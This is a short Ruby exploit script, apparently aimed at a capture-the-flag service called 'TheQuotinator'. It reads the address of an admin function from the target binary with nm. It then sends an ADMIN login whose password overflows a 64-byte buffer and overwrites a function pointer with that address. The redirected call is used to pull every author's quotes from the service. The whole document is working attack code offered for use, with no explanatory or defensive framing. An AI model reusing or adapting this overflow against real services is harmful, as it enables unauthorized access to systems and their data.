#!/usr/bin/ruby

require 'socket'

if ARGV.length < 3 then
    puts "Usage: exploit.rb <host> <port> <quotinator>\n\n"
    puts "Example: exploit.rb 127.0.0.1 6666 /var/services/TheQuotinator/quotinator\n"
    exit
end

BUFFER_SIZE=64

host = ARGV[0]
port = ARGV[1].to_i
addr=`nm #{ARGV[2]} | grep admin_authors_command | awk '{print $1}'`
fcn_ptr=Integer("0x#{addr}")

password='A' * BUFFER_SIZE + [fcn_ptr].pack("V")[0,4]

begin
    a = []
    s = TCPSocket.open(host, port)
    s.write("ADMIN \"user\" \"#{password}\"\r\n")
    s.gets #Read the "login failed" message
    s.write("QUIT\r\n")
    lines = s.gets.to_i
    lines.times {
        a << s.gets.chop
    }
    a.each do |author|
        s.write("QUOTE \"#{author}\" 1\r\n")
        puts s.gets.chop
    end
    s.close
    exit 0
rescue
end
exit 1
